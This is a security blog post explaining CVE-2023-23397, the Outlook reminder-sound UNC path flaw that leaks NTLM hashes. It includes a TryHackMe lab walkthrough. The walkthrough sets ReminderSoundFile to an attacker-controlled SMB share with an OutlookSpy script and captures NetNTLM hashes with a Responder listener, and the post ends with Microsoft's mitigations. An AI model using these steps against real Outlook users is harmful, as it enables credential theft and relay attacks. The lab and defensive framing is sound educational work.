Microsoft Office Outlook Privilege Escalation Vulnerability [CVE-2023-23397]
March’s Patch Tuesday delivered a critical blow to the security landscape with the emergence of CVE-2023-23397, a severe vulnerability found within Outlook. This alarming exploit, which affects all versions of Windows Outlook, has garnered considerable attention due to its 9.8 CVSS rating and its designation as one of two zero-day exploits unveiled on March 14. With the potential for widespread consequences, it is crucial for security teams to stay informed about this vulnerability and its implications. In this blog post, we will delve into the essential details of CVE-2023-23397, providing insights into the risks it poses and offering effective mitigation strategies to safeguard your systems.
Overview of CVE-2023-23397
CVE-2023-23397, a critical privilege elevation and authentication bypass vulnerability, has surfaced as a result of the March Patch Tuesday updates. Regardless of the version of Windows Outlook being used, all are susceptible to this alarming exploit, which earned a daunting 9.8 CVSS rating. Compounding the severity, this vulnerability was one of two zero-day exploits disclosed on March 14, further underscoring the urgency for security teams to address its implications. To shed light on the risks posed by CVE-2023-23397 and equip security teams with effective mitigation strategies, we delve into the intricacies of this vulnerability and its exploitation.
If we talk about the inner workings of CVE-2023-23397. The attacker orchestrates the exploitation by crafting a malicious message equipped with an extended MAPI property, carrying a Universal Naming Convention (UNC) path. This UNC path points to a remote Server Message Block (SMB) hosted on an attacker-controlled server. What’s alarming is that the vulnerability can be triggered regardless of whether the recipient has opened the message or not.
Upon receiving the nefarious message, the victim’s Outlook client unwittingly attempts to authenticate itself with the attacker’s SMB server. This action unwittingly discloses the victim’s New Technology LAN Manager (NTLM) negotiation message, which the attacker can exploit for authentication against other systems that support NTLM authentication. NTLMv2 hashes, the latest Windows authentication protocol, holds hashed representations of users’ vital information, including usernames and passwords. This grants threat actors the opportunity to engage in NTLM relay attacks, potentially compromising additional services or even entire domains if the compromised users have administrative privileges. It is worth noting that while online services like Microsoft 365 are not susceptible to this particular attack due to their lack of support for NTLM authentication, the Microsoft 365 Windows Outlook app remains vulnerable.
To comprehend the underlying mechanism of the vulnerability, we turn our attention to MAPI (Messaging Application Programming Interface). MAPI serves as the messaging architecture for Microsoft Outlook, facilitating the development of Outlook messaging applications and the manipulation of email data. Within the context of CVE-2023-23397, the exploit leverages the “PidLidReminderFileParameter” ExtendedProperty MAPI parameter. This parameter is responsible for specifying the audio file name to be played when an Outlook reminder becomes overdue for a specific object. By manipulating this property to include a UNC path, the vulnerability triggers NTLM authentication, setting the stage for potential exploitation.
In conclusion, CVE-2023-23397 poses a significant threat to the security of Outlook users. Its critical nature, coupled with the potential for privilege elevation and authentication bypass, demands immediate attention from security teams. By understanding the intricacies of vulnerability and implementing appropriate mitigation measures, organizations can fortify their systems against this exploit, safeguarding their sensitive information and maintaining the integrity of their networks.
How to Exploit this Vulnerability
To exploit this vulnerability, it is essential to have a controlled testing environment with preconfigured settings. To gain practical experience and better understand the intricacies of this vulnerability, we will be conducting hands-on exercises using the tryhackme platform. You can access the specific exploit exercise by clicking on the following link: https://tryhackme.com/room/outlookntlmleak. By navigating to this exercise, you will be able to actively engage with the exploit and enhance your understanding of its inner workings.
To begin exploring and testing the CVE-2023-23397 vulnerability in Outlook, follow these steps. First, visit the following link: https://tryhackme.com/room/outlookntlmleak. On the page, locate and click on the ‘Start Machine’ option. This action will initiate a pre-configured virtual machine (VM) that contains all the necessary vulnerable components for testing the mentioned vulnerability. Prior to accessing the VM, you will need to log in to TryHackMe. Once logged in, click on the ‘Join Room’ option to gain access to the room and subsequently start the machine. By following these instructions, you can actively engage with the vulnerability and experiment with its implications in a controlled environment.
Step 2: After launching the virtual machine, proceed to initiate the Outlook application and generate a fresh appointment.
Step 3: Our plan involves scheduling an appointment with a reminder that is set to trigger immediately after the recipient receives it. Additionally, we will select the Sound option to adjust the sound file associated with the reminder.
Step 4: We can attempt to configure the path of the sound file to a UNC path that directs to our AttackBox. Afterward, we can proceed by clicking the OK button in the following manner:
Nevertheless, Outlook will disregard the UNC path without any notification and return to utilizing the default WAV file. This can be verified by revisiting the Sound dialogue.
Step 5: If it’s not possible for Outlook to assign a UNC path as the sound file for the reminder, we can utilize the OutlookSpy plugin to accomplish this. With the help of this plugin, you can directly access all of Outlook’s internal settings, including the sound file for the reminder.
To begin, it is necessary to install OutlookSpy. To do this, close Outlook entirely and locate the installer for OutlookSpy on your computer’s desktop. Please ensure that Outlook is closed before running the installer manually.
Step 6: To access the current appointment in OutlookSpy, follow these steps: first, select the OutlookSpy tab, and then click on the CurrentItem button in the taskbar. This action will prompt a window with several options. Next, find the ‘Reminder SoundFile‘ option, as shown in the Screenshot below.
Step 7: You can view the settings related to the appointment’s reminder through this window. Our objective is to configure the ReminderSoundFile parameter with the UNC path that directs to our AttackBox, and set both ReminderOverrideDefault and ReminderPlaySound to true. Here is an explanation of each parameter:
ReminderPlaySound: A boolean value indicating whether a sound will accompany the reminder.
ReminderOverrideDefault: A boolean value instructing the recipient’s Outlook client to play the sound specified by ReminderSoundFile, instead of the default sound.
ReminderSoundFile: A string containing the file path to the sound file to be used. In our exploit, this path will lead to a fictitious shared folder in our AttackBox.
To achieve the desired configuration, we can utilize the script tab and employ the following script:
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderSoundFile = \\10.10.174.201\nonexistent\sound.wav
To be noted the Above IP is of the AttackerBox.
Step 8: Please ensure that you click the “Run” button to apply the modifications. You can verify the successful update of values by returning to the Properties tab.
Next, proceed to the attacker box and initiate the listener by executing the following command: “responder -I ens5”.
Once you have completed the necessary steps, remember to save your appointment to incorporate it into your calendar. Ensure that the reminder is configured to 0 minutes, and verify that the appointment aligns with the present time and date, allowing it to activate promptly.
Step 9: After the reminder prompt appears, proceed to the attacker’s box and take note of the exposed NetNTLM hash.
What Mitigations Can be made to fix this vulnerability?
The vulnerability represented by CVE was exploited in Outlook Version 1808 (Build 10730.20370) but has been resolved by Microsoft in subsequent updates.
The mentioned vulnerability is currently being actively exploited in real-world scenarios. To mitigate and prevent this attack, Microsoft suggests several precautionary measures:
Include users in the Protected Users Security Group to prevent the usage of NTLM as an authentication mechanism.
Block outbound TCP 445/SMB traffic from your network to prevent any potential post-exploitation connections.
Utilize the PowerShell script provided by Microsoft to scan your Exchange server and identify any potential attack attempts.
Disable the WebClient service to eliminate the possibility of establishing a webdav connection.